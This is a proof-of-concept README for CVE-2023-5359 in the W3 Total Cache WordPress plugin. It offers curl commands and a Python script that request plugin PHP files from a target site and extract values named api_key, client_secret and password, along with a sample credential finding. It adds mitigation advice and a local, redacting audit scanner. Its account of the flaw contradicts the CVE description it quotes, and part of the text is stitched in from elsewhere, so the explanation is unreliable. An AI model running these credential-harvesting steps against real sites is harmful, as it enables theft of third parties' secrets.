CVE-2023-5359 PoC — W3 Total Cache <= 2.7.5 - Sensitive Credentials Stored in Plaintext

Associated Vulnerability
Title: W3 Total Cache <= 2.7.5 - Sensitive Credentials Stored in Plaintext (CVE-2023-5359)
Description: The W3 Total Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.5 via Google OAuth API secrets stored in plaintext in the publicly visible plugin source. This can allow unauthenticated attackers to impersonate W3 Total Cache and gain access to user account information in successful conditions. This would not impact the WordPress users site in any way.
Description
CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability Scanner. Detect exposed credentials in W3 Total Cache plugin versions ≤ 2.7.5.
Readme
# CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability

## Description

**CVE-2023-5359** is a cleartext storage vulnerability affecting the WordPress plugin **W3 Total Cache** in versions ≤ 2.7.5. This vulnerability allows remote attackers to access sensitive credentials stored in unencrypted PHP files that are publicly accessible.

## Severity

- **CVSS Score**: 7.5 (High)
- **Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Type**: Sensitive Information Exposure

## Technical Vulnerability

### Root Cause
W3 Total Cache stores configuration settings and API credentials in PHP files within the `/wp-content/plugins/w3-total-cache/` directory without adequate protection. These files are accessible via HTTP, exposing:

- API Keys (CloudFlare, Google, etc.)
- Client Secrets
- OAuth Tokens
- External service credentials

### Affected Files
```
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php
```

## Exploitation

### Manual Method
```bash
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done
```

### Automated Script
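```python
#!/usr/bin/env python3
import re

import requests

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

# Matches literal assignments such as api_key = "..." in the response body
pattern = re.compile(r"(api_key|client_secret|password)\s*=\s*['\"]([^'\"]+)")

for path in files:
    try:
        # Without a timeout, requests can block indefinitely on an unresponsive host
        response = requests.get(target + path, timeout=10)
    except requests.RequestException as exc:
        print(f"[-] Request for {path} failed: {exc}")
        continue
    credentials = pattern.findall(response.text)
    if credentials:
        print(f"[!] Credentials found in {path}:")
        for key, value in credentials:
            print(f"    {key}: {value}")
```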

## Impact

An attacker can obtain:

1. **CloudFlare credentials** - Take control of CDN and DNS
2. **API Keys for external services** - Access external accounts
3. **OAuth Tokens** - Impersonate identity
4. **Cache configurations** - Manipulate served content

## Mitigation

### Immediate Solution
1. **Update** to W3 Total Cache ≥ 2.7.6
2. **Restrict access** to PHP files in the plugins directory
3. **Revoke and regenerate** all exposed credentials

### Secure Configuration
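```apache
# .htaccess protection
# Apache 2.4 syntax; "Deny from all" / "Allow from all" is the 2.2 form
# and only works on 2.4 when mod_access_compat is loaded.
<Files *.php>
    Require all denied
</Files>
<Files "w3-total-cache.php">
    Require all granted
</Files>
```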

## Detection

### Verification Command
```bash
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"
```
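
For site owners auditing their own installation, the same version check can be run against the plugin files on disk instead of over HTTP, together with a search for literal credential assignments that reports only redacted values. This is an added example, not part of the original repository; the function names and the sample header and source text are constructed for illustration.

```python
import re

LAST_AFFECTED = (2, 7, 5)  # README: versions <= 2.7.5 are affected
# WordPress plugin header line, e.g. " * Version: 2.7.5"
VERSION_RE = re.compile(r"^[ \t/*#@]*Version:\s*([0-9]+(?:\.[0-9]+)*)", re.I | re.M)
# Key names the README's scanner looks for, plus client_id from its sample output
SECRET_RE = re.compile(
    r"""['"]?(api_key|client_id|client_secret|password)['"]?\s*(?:=>|=)\s*['"]([^'"]+)['"]""")


def parse_version(header_text):
    """Return the plugin version as a tuple of ints, or None if no header is found."""
    m = VERSION_RE.search(header_text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def is_affected(version):
    """True for versions <= 2.7.5; pads so (2, 7) compares as 2.7.0."""
    width = max(len(version), len(LAST_AFFECTED))
    pad = lambda v: v + (0,) * (width - len(v))
    return pad(version) <= pad(LAST_AFFECTED)


def redact(value):
    """Keep just enough of a secret to identify it for rotation."""
    if len(value) <= 4:
        return "****"
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def find_hardcoded_secrets(php_source):
    """List (line_number, key, redacted_value) for literal credential assignments."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for key, value in SECRET_RE.findall(line):
            hits.append((lineno, key, redact(value)))
    return hits


# Constructed sample input, not taken from the real plugin source.
SAMPLE_HEADER = "<?php\n/**\n * Plugin Name: W3 Total Cache\n * Version: 2.7.5\n */\n"
SAMPLE_SOURCE = ("<?php\n$cfg = array(\n  'client_id' => 'constructed-id-0001',\n"
                 "  'client_secret' => 'constructed-secret-0001',\n);\n$timeout = 30;\n")

if __name__ == "__main__":
    v = parse_version(SAMPLE_HEADER)
    print("version", v, "affected" if is_affected(v) else "not affected")
    for hit in find_hardcoded_secrets(SAMPLE_SOURCE):
        print("line %d: %s = %s" % hit)
```

Any hit on a real installation identifies a credential to revoke and regenerate, as the Mitigation section advises.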

### Compromise Indicators
- Unusual activity in external APIs
- Changes in CloudFlare configurations
- Traffic from unauthorized IPs to connected services

## Example Finding

```
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
```

## References

- [CVE-2023-5359](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5359)
- [W3 Total Cache Changelog](https://wordpress.org/plugins/w3-total-cache/#developers)
- [WordPress Security Team](https://wordpress.org/support/wordpress-version/version-security/)

## Legal Notice

This repository is for educational purposes and authorized penetration testing only. Malicious use of this information is strictly prohibited.

---


*Last updated: November 2025*
File Snapshot

[4.0K] /data/pocs/8cc184ca3f82f8d828600fdf206a5e4f5fb7bd4a
├── [4.9K] poc.py
└── [4.0K] README.md

1 directory, 2 files